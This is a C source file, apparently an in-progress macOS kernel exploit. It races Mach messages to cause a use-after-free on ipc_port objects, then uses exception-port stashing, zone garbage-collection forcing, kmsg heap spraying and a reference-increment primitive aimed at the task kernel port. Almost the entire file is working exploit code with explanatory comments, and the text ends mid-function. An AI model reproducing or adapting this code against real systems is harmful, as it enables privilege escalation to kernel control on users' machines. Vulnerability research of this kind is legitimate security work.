// @i41nbeer

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <mach/mach.h>
#include <mach/mach_vm.h>
#include <pthread.h>
#include <time.h>

#include "kmemutils_dtrace.h"

#define require(expr) \
do { \
  if (!(expr)) { \
    printf("fail %d\n", __LINE__); \
    exit(EXIT_FAILURE); \
  } \
} while(0)

#define mach_require_success(err) \
do { \
  if ((err) != KERN_SUCCESS) { \
    printf("fail %d\n", __LINE__); \
    printf("err: 0x%x (%s)\n", (err), mach_error_string(err)); \
    exit(EXIT_FAILURE); \
  } \
} while(0)

void log_err(kern_return_t err) {
    printf("err: 0x%x - %s\n", err, mach_error_string(err));
}

mach_port_t rp(void) {
    kern_return_t err;
    mach_port_t name = MACH_PORT_NULL;
    err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &name);
    require(err == KERN_SUCCESS);
    
    return name;
}

mach_port_t sr() {
  kern_return_t err;
  mach_port_t p = rp();
  err = mach_port_insert_right(mach_task_self(), p, p, MACH_MSG_TYPE_MAKE_SEND);
  return p;
}

struct task_get_special_port_req {
  mach_msg_header_t hdr;
  NDR_record_t ndr_record;
  int32_t which;
};

// pass in a send right for the reply; will use COPY_SEND disp
void task_get_special_port_pend_reply(mach_port_t reply_right) {
  kern_return_t err;

  struct task_get_special_port_req req = {0};

  req.hdr.msgh_remote_port = mach_task_self();
  req.hdr.msgh_local_port = reply_right;
  req.hdr.msgh_bits = MACH_MSGH_BITS_SET(
      MACH_MSG_TYPE_COPY_SEND, // remote
      MACH_MSG_TYPE_COPY_SEND, // local
      0,                       // voucher
      0);                      // other
  req.hdr.msgh_size = sizeof(req);

  req.hdr.msgh_id = 3409;

  req.which = TASK_KERNEL_PORT;

  err = mach_msg_send((mach_msg_header_t*)&req);
  if (err != KERN_SUCCESS) {
    printf("msg_msg_send failed: %x (%s)\n", err, mach_error_string(err));
  }
}

void inc() {
  task_get_special_port_pend_reply(sr());
}

void set_task_kernel(mach_port_t port) {
  kern_return_t err;
  err = task_set_special_port(mach_task_self(), TASK_KERNEL_PORT, port);
  if (err != KERN_SUCCESS) {
    printf("failed to set TASK_KERNEL_PORT err: 0x%x (%s)\n", err, mach_error_string(err));
    return;
  }
}

/*
  build a message with port descriptors inside "ipc kmsgs" zone
*/
struct kmsg_zone_msg {
    mach_msg_header_t hdr;
    mach_msg_body_t body;
    mach_msg_port_descriptor_t port_desc_a;
    mach_msg_port_descriptor_t port_desc_b;
    mach_msg_port_descriptor_t port_desc_c;
    uint8_t pad[0];
};

mach_msg_header_t* build_replacer_msg(mach_port_t target_port) {
  struct kmsg_zone_msg* msg = calloc(sizeof(struct kmsg_zone_msg), 1);

  //mach_port_t dst = rp();

  //msg->hdr.msgh_remote_port = dst;

  msg->hdr.msgh_bits = MACH_MSGH_BITS_SET(
    MACH_MSG_TYPE_MAKE_SEND, // remote
    0,                       // local
    0,                       // voucher
    MACH_MSGH_BITS_COMPLEX); // other

  msg->body.msgh_descriptor_count = 3;

  msg->port_desc_a.type = MACH_MSG_PORT_DESCRIPTOR;
  msg->port_desc_a.name = target_port;
  msg->port_desc_a.disposition = MACH_MSG_TYPE_COPY_SEND;
  
  msg->port_desc_b.type = MACH_MSG_PORT_DESCRIPTOR;
  msg->port_desc_b.name = target_port;
  msg->port_desc_b.disposition = MACH_MSG_TYPE_COPY_SEND;
  
  msg->port_desc_c.type = MACH_MSG_PORT_DESCRIPTOR;
  msg->port_desc_c.name = target_port;
  msg->port_desc_c.disposition = MACH_MSG_TYPE_COPY_SEND;

  msg->hdr.msgh_size = sizeof(struct kmsg_zone_msg);
  msg->hdr.msgh_id = 0x41414141;

  return &msg->hdr;
}

void test_replacer() {
  kern_return_t err;

  mach_port_t test_target = sr();

  mach_msg_header_t* msg = build_replacer_msg(test_target);
  
  mach_port_t dst = rp();

  msg->msgh_remote_port = dst;

  err = mach_msg_send((mach_msg_header_t*)msg);
  if (err != KERN_SUCCESS) {
    printf("failed to send test replacer message 0x%x (%s)\n", err, mach_error_string(err));
  }


  uint64_t proc = proc_pointer_for_pid(getpid());
  uint64_t dst_port_kaddr = lookup_port_in_proc(proc, dst);
  dump_port_message_queue(dst_port_kaddr);
  gets(NULL);
  return;
}



/*
  this is a weird trick to be able to stash a lot of send rights with the kernel
  such that we can tell if they've become dead names without loosing the ability to
  re-grab the name again if they actually got free'd because the bug worked.

  The usual ways to stash ports like having them in-transit in a message or
  using mach_ports_register doesn't work because in-transit we only get one chance
  to examine them (and if the port is dead, it's gone) and mach_ports_register doesn't
  let us stash enough ports.

  We want something like a huge array of mach ports maintained by the kernel which
  we can access quite freely and which doesn't have destructive reads like a process's
  port namespace has (ipc_right_check will drop a ref the first time you try to resolve
  a dead name.)

  The kernel does however maintain quite a lot of mach ports on behalf of userspace,
  for example task and thread special ports and task and thread exception ports.

  We'll use thread exception ports; we can register a lot of them (11 per thread) and
  threads are pretty cheap.
*/

#define n_ports_per_thread 11

void* sleepy_thread_func(void* arg) {
  while(1) {sleep(9*60*60);} 
  return NULL;
}

uint32_t stashed_ports_array_size = 0;

uint32_t n_sleepy_threads = 0;
mach_port_t* sleepy_thread_ports = NULL;
pthread_t* sleepy_pthreads = NULL;

#define thread_index(index) (index / n_ports_per_thread)
#define port_mask(index) (2 << (index % n_ports_per_thread))

void check_index(uint32_t index) {
  if (index < stashed_ports_array_size) {
    return;
  }

  printf("index %d is greater than stashed_ports_array_size (%d)\n", index, stashed_ports_array_size);
  exit(EXIT_FAILURE);
}

void stashed_ports_array_clear_all() {
  kern_return_t err;

  for (int i = 0; i < n_sleepy_threads; i++) {
    uint32_t mask_all = 0xffe;
    err = thread_set_exception_ports(sleepy_thread_ports[i],
                                     mask_all,
                                     MACH_PORT_NULL,
                                     EXCEPTION_STATE,
                                     x86_THREAD_STATE);
    if (err != KERN_SUCCESS) {
      printf("failed to set thread exception port for mask: %d\n", mask_all);
      exit(EXIT_FAILURE);
    }
  }
}

void stashed_ports_array_write(uint32_t index, mach_port_t port) {
  kern_return_t err;

  check_index(index);
  mach_port_t tp = sleepy_thread_ports[thread_index(index)];
  uint32_t exc_mask = port_mask(index);

  err = thread_set_exception_ports(tp,
                                   exc_mask,
                                   port,
                                   EXCEPTION_STATE,
                                   x86_THREAD_STATE);
  if (err != KERN_SUCCESS) {
    printf("failed to set thread exception port for mask: %d\n", exc_mask);
    exit(EXIT_FAILURE);
  }
}

mach_port_t stashed_ports_array_read(uint32_t index) {
  kern_return_t err;

  check_index(index);
  mach_port_t tp = sleepy_thread_ports[thread_index(index)];
  uint32_t exc_mask = port_mask(index);

  mach_msg_type_number_t masksCnt = EXC_TYPES_COUNT;
  exception_mask_t masks[EXC_TYPES_COUNT] = {0};
  mach_port_t ports[EXC_TYPES_COUNT] = {0};
  exception_behavior_t behaviors[EXC_TYPES_COUNT] = {0};
  thread_state_flavor_t flavors[EXC_TYPES_COUNT] = {0};

  err = thread_get_exception_ports(tp, exc_mask, masks, &masksCnt, ports, behaviors, flavors);
  if (err != KERN_SUCCESS) {
    printf("thread_get_exception_ports: 0x%x %s\n", err, mach_error_string(err));
    exit(EXIT_FAILURE);
  }

  if (masks[0] != exc_mask) {
    printf("unexpected returned mask: 0x%x, expected: 0x%x\n", masks[0], exc_mask);
    exit(EXIT_FAILURE);
  }
  return ports[0];
}


mach_port_t stashed_ports_array_swap(uint32_t index, mach_port_t port) {
  return MACH_PORT_NULL;
}

// this MUST be called before there are any other threads!
// (or, well, refactor it!)
void stashed_ports_array_alloc(uint32_t n_ports) {
  stashed_ports_array_size = n_ports;
  // how many threads do we need?
  // full threads:
  n_sleepy_threads = n_ports / n_ports_per_thread;
  // any leftover?
  if (n_ports % n_ports_per_thread) {
    n_sleepy_threads++;
  }

  sleepy_pthreads = calloc(n_sleepy_threads, sizeof(pthread_t));
  sleepy_thread_ports = calloc(n_sleepy_threads, sizeof(mach_port_t));

  for (uint32_t i = 0; i < n_sleepy_threads; i++) {
    int pthread_err;
    pthread_err = pthread_create(&sleepy_pthreads[i], NULL, sleepy_thread_func, NULL);
    if (pthread_err != 0) {
      printf("failed to create thread %d\n", i);
      perror("");
      exit(EXIT_FAILURE);
    }
  }

  thread_array_t threads;
  mach_msg_type_number_t threadsCnt;
  kern_return_t err;
  err = task_threads(mach_task_self(), &threads, &threadsCnt);

  if (threadsCnt != (n_sleepy_threads + 1)) {
    printf("there were other threads running; refactor this code!\n");
    exit(EXIT_FAILURE);
  }

  mach_port_t thread_self = mach_thread_self();
  uint32_t cnt = 0;
  for (uint32_t i = 0; i < threadsCnt; i++) {
    mach_port_t p = threads[i];
    if (p == thread_self) {
      mach_port_deallocate(mach_task_self(), p);
      continue;
    }
    sleepy_thread_ports[cnt++] = p;
  }

  mach_vm_deallocate(mach_task_self(), (mach_vm_address_t)threads, threadsCnt*4);

  printf("got %d sleepy threads\n", cnt);
}

void test_stash() {
  kern_return_t err;
  int n_test_ports = 1024;
  stashed_ports_array_alloc(n_test_ports);
 
  mach_port_t ports[n_test_ports];

  for (int i = 0; i < n_test_ports; i++) {
    mach_port_t p = rp();
    err = mach_port_insert_right(mach_task_self(), p, p, MACH_MSG_TYPE_MAKE_SEND);
    ports[i] = p;

    stashed_ports_array_write(i, p);
  }

  for (int i = 0; i < n_test_ports; i++) {
    mach_port_t p = stashed_ports_array_read(i);
    if (p != ports[i]) {
      printf("reading back stashed port index %d got mis-match (expected: 0x%x, got 0x%x)\n", i, ports[i], p);
      exit(EXIT_FAILURE);
    }
  }

  printf("stashed ports all matched!\n");
  // clear then check that none match!
  stashed_ports_array_clear_all();
  
  for (int i = 0; i < n_test_ports; i++) {
    mach_port_t p = stashed_ports_array_read(i);
    if (p != MACH_PORT_NULL) {
      printf("got a port back after clearing it; index %d; returned port: 0x%x, in our array we have: 0x%x there\n", i, p, ports[i]);
      exit(EXIT_FAILURE);
    }
  }
}


// trivial append-only vector type

typedef struct port_vec {
  mach_port_t* ports;
  size_t allocated;
  size_t used;
} pv_t;

pv_t* pv_alloc() {
  return calloc(sizeof(pv_t), 1);
}

#define port_vec_initial_capacity 1024

// you can't allocate this many ports anyway...
#define port_vec_max_capacity 512*1024*1024
void pv_append(pv_t* pv, mach_port_t port) {
  if (pv->ports == NULL) {
    // first use:
    pv->allocated = port_vec_initial_capacity;
    pv->ports = calloc(port_vec_initial_capacity, 4);
    pv->used = 0;
  }

  if (pv->used == pv->allocated) {
    // grow vector:
    require(pv->allocated < port_vec_max_capacity);

    pv->allocated *= 2;

    pv->ports = realloc(pv->ports, pv->allocated * 4);
    require(pv->ports);

    // clear the end - just in case
    memset(&pv->ports[pv->used], 0, (pv->allocated - pv->used) * 4);
  }

  // this must be true now
  require(pv->used < pv->allocated);
  pv->ports[pv->used++] = port;
}

void pv_free_and_destroy_rights(pv_t* pv) {
  for (size_t i = 0; i < pv->used; i++) {
    mach_port_destroy(mach_task_self(), pv->ports[i]);
  }
  free(pv->ports);
  free(pv);
}

void pv_free_and_do_not_destroy_rights(pv_t* pv) {
  free(pv->ports);
  free(pv);
}


struct trigger_msg {
    mach_msg_header_t hdr;
    mach_msg_body_t body;
    uint32_t invalid_desc;
};

void build_trigger_message(struct trigger_msg* msg, mach_port_t target_port) {
    memset(msg, 0, sizeof(struct trigger_msg));

    // dest and reply must name the same port:
    msg->hdr.msgh_remote_port = target_port;
    msg->hdr.msgh_local_port = target_port;

    // they must both use COPY_SEND disposition:
    msg->hdr.msgh_bits = MACH_MSGH_BITS_SET(
      MACH_MSG_TYPE_COPY_SEND, // remote
      MACH_MSG_TYPE_COPY_SEND, // local
      0,                       // voucher
      MACH_MSGH_BITS_COMPLEX); // other

    // claim we have a single descriptor, but we're really too small
    // this will cause ipc_kmsg_copy_body to clean the kmsg

    msg->body.msgh_descriptor_count = 1;
    msg->invalid_desc = 0;

    msg->hdr.msgh_size = sizeof(struct trigger_msg);
}

/*
 * We need a port for which we hold a send right to move from active to inactive
 * while our space is locked. We can do that by getting it destructed while in-limbo.
 * Note that an in-limbo MOVE_RECEIVE can still receive.
 * The in-limbo destruction needs to happen between the target ipc_right_copyin
 * and the ipc_port_copy_send; this is the race window.
 */

struct inactivate_in_limbo_msg {
    mach_msg_header_t hdr;
    mach_msg_body_t body;
    mach_msg_port_descriptor_t port_desc;
    mach_msg_port_descriptor_t invalid_desc;
};

void build_inactivate_in_limbo_msg(struct inactivate_in_limbo_msg* msg, mach_port_t send_to_limbo) {
    mach_port_t dst = rp();

    memset(msg, 0, sizeof(struct inactivate_in_limbo_msg));
    
    msg->hdr.msgh_remote_port = dst;

    msg->hdr.msgh_bits = MACH_MSGH_BITS_SET(
      MACH_MSG_TYPE_MAKE_SEND, // remote
      0,                       // local
      0,                       // voucher
      MACH_MSGH_BITS_COMPLEX); // other

    msg->body.msgh_descriptor_count = 2;

    // the first descriptor is valid:
    msg->port_desc.type = MACH_MSG_PORT_DESCRIPTOR;
    msg->port_desc.name = send_to_limbo;
    msg->port_desc.disposition = MACH_MSG_TYPE_MOVE_RECEIVE;

    // an invalid descriptor to cause the destruction of the receive right but without the space being locked
    // (as by this point the receive right isn't in our space)

    msg->invalid_desc.type = MACH_MSG_PORT_DESCRIPTOR;
    msg->invalid_desc.name = 0xffff;
    msg->invalid_desc.disposition = MACH_MSG_TYPE_MOVE_RECEIVE;

    msg->hdr.msgh_size = sizeof(struct inactivate_in_limbo_msg);
}

// TODO: don't do this on ARM64.. something something memory ordering
// use a lock.
mach_msg_header_t* thread_msg = NULL;
volatile int thread_should_send = 0;
volatile int thread_has_sent = 0;

void* multi_trigger_thread(void* arg) {
    kern_return_t err;

    while(1) {
        while(!thread_should_send) {;}
        err = mach_msg_send(thread_msg);
        //log_err(err);
        thread_should_send = 0;
        thread_has_sent = 1;
    }


    return NULL;
}

int have_thread = 0;
pthread_t mt;

void send_in_parallel(mach_msg_header_t* msg_a, mach_msg_header_t* msg_b) {
    kern_return_t err;

    if (!have_thread) {
        pthread_create(&mt, NULL, multi_trigger_thread, NULL);
        have_thread = 1;
    }

    thread_msg = msg_b;
    thread_should_send = 1;

    err = mach_msg_send(msg_a);
    while(!thread_has_sent) {;}
    thread_has_sent = 0;
}

uint64_t get_now_nsec() {
  return clock_gettime_nsec_np(CLOCK_UPTIME_RAW);
}

uint64_t start_stopwatch() {
  return get_now_nsec();
}

uint64_t stop_stopwatch(uint64_t start_timestamp) {
  return (get_now_nsec() - start_timestamp);
}

void print_elapsed(uint64_t gap) {
  printf("ns: %lld us: %lld ms: %lld\n", gap, gap/1000, gap/1000000);
}

mach_port_t longq() {
  kern_return_t err;

  mach_port_t p = rp();

  // the upper bound is 1024 ports:
  mach_port_limits_t l = {0};
  l.mpl_qlimit = MACH_PORT_QLIMIT_LARGE;

  err = mach_port_set_attributes(mach_task_self(),
                                 p,
                                 MACH_PORT_LIMITS_INFO,
                                 (mach_port_info_t)&l,
                                 MACH_PORT_LIMITS_INFO_COUNT);
  require(err == KERN_SUCCESS);

  return p;
}


// idea is to try to hit the high-water mark
// use timing to figure out when it occured

// MacOS:
uint32_t kalloc_zone_sizes[] = {
  16, 32, 48, 64, 80, 96, 128, 160, 192, 224, 256, 288, 368,
  400, 512, 576, 768, 1024, 1152, 1280, 1664, 2048, 4096,
  6144, 8192, 12288, 16384};

#define n_kalloc_zones (sizeof(kalloc_zone_sizes)/sizeof(kalloc_zone_sizes[0]))

struct kalloc_msg_header { 
  mach_msg_header_t hdr;
  mach_msg_body_t body;
  mach_msg_ool_ports_descriptor_t ool_ports[0];
};

struct single_kalloc_msg { 
  mach_msg_header_t hdr;
  mach_msg_body_t body;
  mach_msg_ool_ports_descriptor_t ool_ports;
};

uint32_t size_class_below(uint32_t target_size) {
  uint32_t prev_size_class = kalloc_zone_sizes[0];
  for (int i = 1; i < n_kalloc_zones; i++) {
    uint32_t this_size_class = kalloc_zone_sizes[i];
    if (this_size_class >= target_size) {
      return prev_size_class;
    }
    prev_size_class = this_size_class;
  }
  require(0);
  return 0;
}

#define MAX_OOL_PORT_COUNT 16300

mach_msg_header_t* build_kalloc_message(uint32_t n_descs, uint32_t ports_per_desc) {
  //printf("n_descs: %d, ports_per_desc: %d, total_ports: %d\n", n_descs, ports_per_desc, n_descs*ports_per_desc);
  uint32_t msg_size = sizeof(struct kalloc_msg_header) +
                      (sizeof(mach_msg_ool_ports_descriptor_t) * n_descs);
  uint32_t ports_size = ports_per_desc * sizeof(mach_port_t);

  struct kalloc_msg_header* msg = malloc(msg_size + ports_size);
  memset(msg, 0, msg_size+ports_size);

  msg->hdr.msgh_size = msg_size;

  msg->body.msgh_descriptor_count = n_descs;

  mach_port_t* ports = (mach_port_t*)(((uint8_t*)msg)+msg_size);
  memset(ports, 0, ports_per_desc * sizeof(mach_port_t));
  // make each other one a DEADNAME so we can recognize it:
  for (int i = 0; i < ports_per_desc; i+=2) {
    ports[i] = 0xffffffff;
  }

  for (int i = 0; i < n_descs; i++) {
    msg->ool_ports[i].address = ports;
    msg->ool_ports[i].count = ports_per_desc;
    msg->ool_ports[i].deallocate = 0;
    msg->ool_ports[i].disposition = MACH_MSG_TYPE_COPY_SEND;
    msg->ool_ports[i].type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
    msg->ool_ports[i].copy = MACH_MSG_PHYSICAL_COPY;
  }

  return (mach_msg_header_t*)msg;
}


mach_port_t make_kallocs(uint32_t size, uint32_t n_required_allocs) {
  kern_return_t err;
  // what's the minimum number of ool ports which would cause an allocation in the target size-class?
  uint32_t smaller_size = size_class_below(size);

  // add 8 (the size of one port pointer) to get the minimum kalloc size we need
  uint32_t actual_kalloc_size = smaller_size + 8;

  uint32_t n_ports_in_ool_desc = actual_kalloc_size / 8;

  // so an ool_ports descriptor with that number of ports will cause a kalloc in the target zone
  // how many of them can we put in a message?

  uint32_t descs_per_message_limit = MAX_OOL_PORT_COUNT / n_ports_in_ool_desc;

  // now split that into full and empty:
  uint32_t n_full_messages = n_required_allocs/descs_per_message_limit;

  // what's the remainder?
  uint32_t leftover_allocs = n_required_allocs - (n_full_messages*descs_per_message_limit);

  uint32_t total_required_messages = n_full_messages + 1;
  if (total_required_messages > MACH_PORT_QLIMIT_LARGE) {
    printf("too many messages needed for this size + n_required_allocs...\n");
    require(0);
  }

  mach_port_t dstq = longq();

  mach_msg_header_t* full_msg = build_kalloc_message(descs_per_message_limit, n_ports_in_ool_desc);
  full_msg->msgh_remote_port = dstq;
  full_msg->msgh_bits = MACH_MSGH_BITS_SET(
    MACH_MSG_TYPE_MAKE_SEND, // remote
    0,                       // local
    0,                       // voucher
    MACH_MSGH_BITS_COMPLEX); // other

  mach_msg_header_t* partial_msg = NULL;
  if (leftover_allocs) {
    partial_msg = build_kalloc_message(leftover_allocs, n_ports_in_ool_desc);
    partial_msg->msgh_remote_port = dstq;
    partial_msg->msgh_bits = MACH_MSGH_BITS_SET(
      MACH_MSG_TYPE_MAKE_SEND, // remote
      0,                       // local
      0,                       // voucher
      MACH_MSGH_BITS_COMPLEX); // other
  }

  // send them!
  for (int i = 0; i < n_full_messages; i++) {
    err = mach_msg_send((mach_msg_header_t*)full_msg);
    mach_require_success(err);
  }

  if (leftover_allocs) {
    err = mach_msg_send((mach_msg_header_t*)partial_msg);
    mach_require_success(err);
  }

  free(full_msg);
  free(partial_msg);

  return dstq;
}




// allocating 1.5MB takes about 0.5ms with no GC


void force_gc() {
  // I'm deliberately leaving 1024 out of this list so I can use it as the early-release holder
  uint32_t sizes[] =
    {16384, 12288, 8192, 6144, 4096, 2048, 1664, 1280, 1152, /*1024,*/ 768, 576,
     512, 400, 368, 288, 256, 224, 192, 160, 128, 96, 80, 64, 48, 32, 16, 0};
  #define N_HOLDERS 200
  mach_port_t holders[N_HOLDERS] = {MACH_PORT_NULL};

  int did_gc = 0;

  for (int i = 0; i < 20; i++) {
    uint32_t target_size = sizes[i];
    if (target_size == 0) {
      break;
    }

    // how many kallocs are needed of this size for about 1MB?
    uint32_t n_kallocs = (1024*1024) / target_size;
    printf("new target size: %d\n", target_size);

    for (int j = 0; j < N_HOLDERS; j++) {
      uint64_t ts = start_stopwatch();
      holders[j] = make_kallocs(target_size, n_kallocs);
      ts = stop_stopwatch(ts);
      //print_elapsed(ts);
      if (ts > 8000000) {
        printf("possible GC?\n");
        did_gc = 1;
        break;
      }
    }

    // free them to make them collectable when the time comes:
    for (int j = 0; j < N_HOLDERS; j++) {
      mach_port_destroy(mach_task_self(), holders[j]);
      holders[j] = MACH_PORT_NULL;
    }

    if (did_gc) {
      break;
    }

  }
}

int attempts = 0;

mach_port_t trigger_attempt(mach_port_t target_port, uint32_t stashed_index) {
  /*
    if ((attempts++ % 1000) == 0) {
      fwrite(".", 1, 1, stdout);
      fflush(stdout);
    }
    if ((attempts % 80000) == 0) {
      fwrite("\n", 1, 1, stdout);
      fflush(stdout);
    }
    */
    attempts++;
    kern_return_t err;

    // at this point target port has two refereces:
    // 1) the receive|send right in our task's namespace
    // 2) the stash in another thread's exception port's table

    struct trigger_msg trigger_msg = {};
    build_trigger_message(&trigger_msg, target_port);

    struct inactivate_in_limbo_msg limbo_msg = {};
    build_inactivate_in_limbo_msg(&limbo_msg, target_port);

    // send them in "parallel" and hope the timing works out...
    send_in_parallel(&trigger_msg.hdr, &limbo_msg.hdr);

    // both messages were sent
    // if that worked then the port named by target_port is now inactive, has only 1 ref but there are two pointers
    // to it:
    //   * one in this task's port namespace (not yet a dead-name, until ipc_right_check)
    //   * one in the stashed array
    //
    // I can't find a good trick to determinstically tell us if we won the race as ipc_port_destroy
    // means the nsrequests trick doesn't work. Best I can come up with is this:
    //
    // 1) drop the ref held by target_port; if we won the race then that should destroy the port
    //      leaving a dangling mach port pointer in the stashed ports array
    // 2) allocate enough ports to grab that free'd allocation if it happened
    // 3) read the stashed port; if that port name is already in our namespace then we won
    // 4) otherwise, clean up and try again

    // drop the ref held by rp (it's a dead name so we could do anything using the name here and it would get free'd)
    //
    // at this port if the bug triggered then this will free target_port leaving a dangling port in the stashed array
    //
    // but if the bug didn't trigger then this won't free the target port; there will still be the reference in the stash array 
    // (because that becoming a dead name doesn't cause that pointer to become DEAD_NAME)
    mach_port_deallocate(mach_task_self(), target_port);

    // 32
    #define N_REALLOC_PORTS 16
    mach_port_t holders[N_REALLOC_PORTS];

    for (int i = 0; i < N_REALLOC_PORTS; i++) {
      holders[i] = rp();
    }

    // if the race worked, that then hopefully reallocated the freed port
    // we can check by grabbing the stashed port; that will force a reverse lookup in our ports table
    // and if it's in there already then it worked!
    // if it didn't work we'll just get a dead name:

    int success = 0;
    mach_port_t from_stash = stashed_ports_array_read(stashed_index);
    if (from_stash != MACH_PORT_DEAD) {
      success = 1;
    }

    if (success) {
      printf("@@@@ WON!! @@@@: attempts: %d\n", attempts);
      // at this point from stash names one of the ports in holders:
      // that port only has one ref but there are two pointers:
      //   1) the one in our port namespace
      //   2) the one in the stashed array (a send right)
      return from_stash;
    }

    // we didn't win; clean up:
    for (int i = 0; i < N_REALLOC_PORTS; i++) {
      mach_port_destroy(mach_task_self(), holders[i]);
    }

    mach_port_destroy(mach_task_self(), limbo_msg.hdr.msgh_remote_port);

    return MACH_PORT_NULL;
}

pv_t* alloc_ports(uint32_t n_ports) {
  pv_t* pv = pv_alloc();
  for (uint32_t i = 0; i < n_ports; i++) {
    pv_append(pv, rp());
  }
  return pv;
}

void* busy_thread_func(void* arg) {
  printf("busy thread\n");
  volatile int cnt = 0;
  while(1) {
    cnt++;
  }
  return NULL;
}

// some busy threads which aren't doing anything with mach ports!
// we want to cause context switches to hit the race window
void start_busy_threads(int n_threads) {
  pthread_t th[n_threads];
  for (int i = 0; i < n_threads; i++) {
    pthread_create(&th[i], NULL, busy_thread_func, NULL);
  }
}


#define N_KMSG_HOLDERS 8000
void sploit_with_groom() {
  printf("running...\n");
  kern_return_t err;

  // allocate the destination ports up-front:
  mach_port_t kmsg_holders[N_KMSG_HOLDERS];
  for (int i = 0; i < N_KMSG_HOLDERS; i++) {
    kmsg_holders[i] = longq(); // queue of 1024 messages
  }
  
  mach_port_t replacer_target = sr();

  // this allocates a global stash array
  // (doesn't allocate the ports but starts many many threads!)
  uint32_t n_candidate_ports = 10000;
  stashed_ports_array_alloc(n_candidate_ports);

  start_busy_threads(1);

  force_gc();
  force_gc();
  sleep(2);

  uint32_t n_xports = 6241*30; // 30MB actually
  mach_port_t xports[n_xports];
  for (int i = 0; i < n_xports; i++) {
    xports[i] = rp();
  }




// make a large early sacraficial allocation which we'll drop right before triggering the GC to
// reduce the probability that our target page get's reused by the GC-triggering code itself

#define N_EARLY_RELEASE 200
// this size won't be used by the GC-forcing code so it will only be re-used when the gc is triggered
#define EARLY_RELEASE_SIZE 1024
  mach_port_t early_release[N_EARLY_RELEASE] = {MACH_PORT_NULL};
  for (int i = 0; i < N_EARLY_RELEASE; i++) {
    early_release[i] = make_kallocs(EARLY_RELEASE_SIZE, 1024); // 1MB
  }

  while (1) {
    // fill holes in ipc_ports
    pv_t* early_ports = alloc_ports(1024);

    // candidate ports
    pv_t* candidate_ports = alloc_ports(n_candidate_ports);

    // late ports
    pv_t* late_ports = alloc_ports(1024);

    // stash the candidate ports:
    for (uint32_t i = 0; i < candidate_ports->used; i++) {
      mach_port_t candidate_port = candidate_ports->ports[i];
      err = mach_port_insert_right(mach_task_self(), candidate_port, candidate_port, MACH_MSG_TYPE_MAKE_SEND);
      stashed_ports_array_write(i, candidate_port);
    }


    // now try to trigger the bug on each candidate port
    for (uint32_t i = 0; i < candidate_ports->used; i++) {
      mach_port_t candidate_port = candidate_ports->ports[i];
      mach_port_t success_port = trigger_attempt(candidate_port, i);
      if (success_port) {
        printf("@@@@ success; do something @@@\n");
        // success port only has 1 ref but there are two pointers;
        // one in our namespaces and one in the stashed array (index i)
        
        set_task_kernel(success_port);
        
        err = mach_port_set_context(mach_task_self(), success_port, 0x4141414141414141);
        if (err != KERN_SUCCESS) {
          printf("failed to set context on success port, do we have receive right?\n");
        } else {
          printf("set context to AAAAAAAA\n");
        }
        // now task->itk_settable_self also has a ref, so 2 refs, three pointers
        // itk_settable_self has some nice properties; when you try to read it there's
        // a level of indirection by a "substitution port"; this wraps the real target port in
        // another port (so success_port become's that port's ip_kobject.)
        // To do that they call ip_reference on success_port, but absolutely nothing else.
        // ip_reference doesn't do a zone_require check, it's just an atomic increment (so
        // long as the reference wasn't 0.) The trick is to not use the MIG wrapper for
        // task_get_special_port but send the request message ourselves. That way we can avoid
        // receiving the reply, which would "unwrap" the port causing other methods to be called
        // on it which would cause a zone_require check. But if we just use the raw MIG message
        // combined with destroying the reply port we can get an arbitrary, controlled interleaving
        // of increments and decrements without hitting zone_require!

        // log success_port kaddr
        printf("success port kaddr: 0x%016llx\n", port_kaddr(success_port));

        // free xports:
        for (int i = 0; i < n_xports; i++) {
          mach_port_destroy(mach_task_self(), xports[i]);
        }


        // drop final ref in candidate ports; task_kernel pointer is then dangling: 
        pv_free_and_destroy_rights(early_ports);

        // drop one ref in the stashed ports (leaving one ref and 2 pointers)
        stashed_ports_array_clear_all();
        pv_free_and_destroy_rights(candidate_ports);
        mach_port_deallocate(mach_task_self(), success_port); // success port should actually be in candidate ports?
        mach_port_destroy(mach_task_self(), success_port);

        pv_free_and_destroy_rights(late_ports);

        // force GC
        force_gc();
        sleep(2);
        force_gc();

        // zone transfer
        sleep(2);

        printf("trying to reallocate\n");
        // reallocate kmsgs:
        mach_msg_header_t* msg = build_replacer_msg(replacer_target);
        uint32_t sent_replacers = 0;
        for (int i = 0; i < N_KMSG_HOLDERS; i++) {
          msg->msgh_remote_port = kmsg_holders[i];
          for (int j = 0; j < 1024; j++) {
            err = mach_msg_send(msg);
            if (err != KERN_SUCCESS) {
              printf("reallocate msg send failed (%d, %d) 0x%x %s\n", i, j, err, mach_error_string(err));
              exit(EXIT_FAILURE);
            }
            sent_replacers++;
          }
        }

        printf("did reallocate with %d sent replacers?\n", sent_replacers);
        printf("press any key to cause an increment\n");
        int vvv = 0;
        gets(&vvv);

        inc();
        printf("did inc\n");
        gets(&vvv);

        // check zone transfer:



      }
    }

    // got all the way along and didn't win the race; recycle the ports and try again
    // could implement a fast clear as we can actually clear 11 at a time?

    pv_free_and_destroy_rights(early_ports);
    
    // empty stash
    stashed_ports_array_clear_all();
    
    pv_free_and_destroy_rights(late_ports);

    pv_free_and_do_not_destroy_rights(candidate_ports);
  }
}

// this should be enough for 2GB?!?! of kmsgs
#define N_KMSG_HOLDERS 8000
void test_zone_transfer() {
  kern_return_t err;

  force_gc();
  force_gc();

  mach_port_t replacer_target = sr();

  // allocate the destination ports up-front:
  mach_port_t kmsg_holders[N_KMSG_HOLDERS];
  for (int i = 0; i < N_KMSG_HOLDERS; i++) {
    kmsg_holders[i] = longq(); // queue of 1024 messages
  }

  // allocate the ports which we would like to move:

  // do we need a lot more of these?
  // need at least 1MB of sacraficial ports which can get reused by the GC trigger code
  // 20MB of ports:
  uint32_t n_early_ports = 6241*30; // 30MB actually
  mach_port_t early_ports[n_early_ports];
  for (int i = 0; i < n_early_ports; i++) {
    early_ports[i] = rp();
  }

  // also should reboot first?


  uint32_t n_target_ports = 4096;
  mach_port_t target_ports[n_target_ports];
  
  for (int i = 0; i < n_target_ports; i++) {
    target_ports[i] = rp();
  }

  uint64_t target_port_kaddr = port_kaddr(target_ports[2048]);
  printf("target port kaddr: 0x%016llx\n", target_port_kaddr);

  //uint64_t hello;
  //gets(&hello);

  // do the transfer
  
  for (int i = 0; i < n_early_ports; i++) {
    mach_port_destroy(mach_task_self(), early_ports[i]);
  }

  for (int i = 0; i < n_target_ports; i++) {
    mach_port_destroy(mach_task_self(), target_ports[i]);
  }

  printf("before gc\n");
  // trigger GC
  //uint64_t hello;
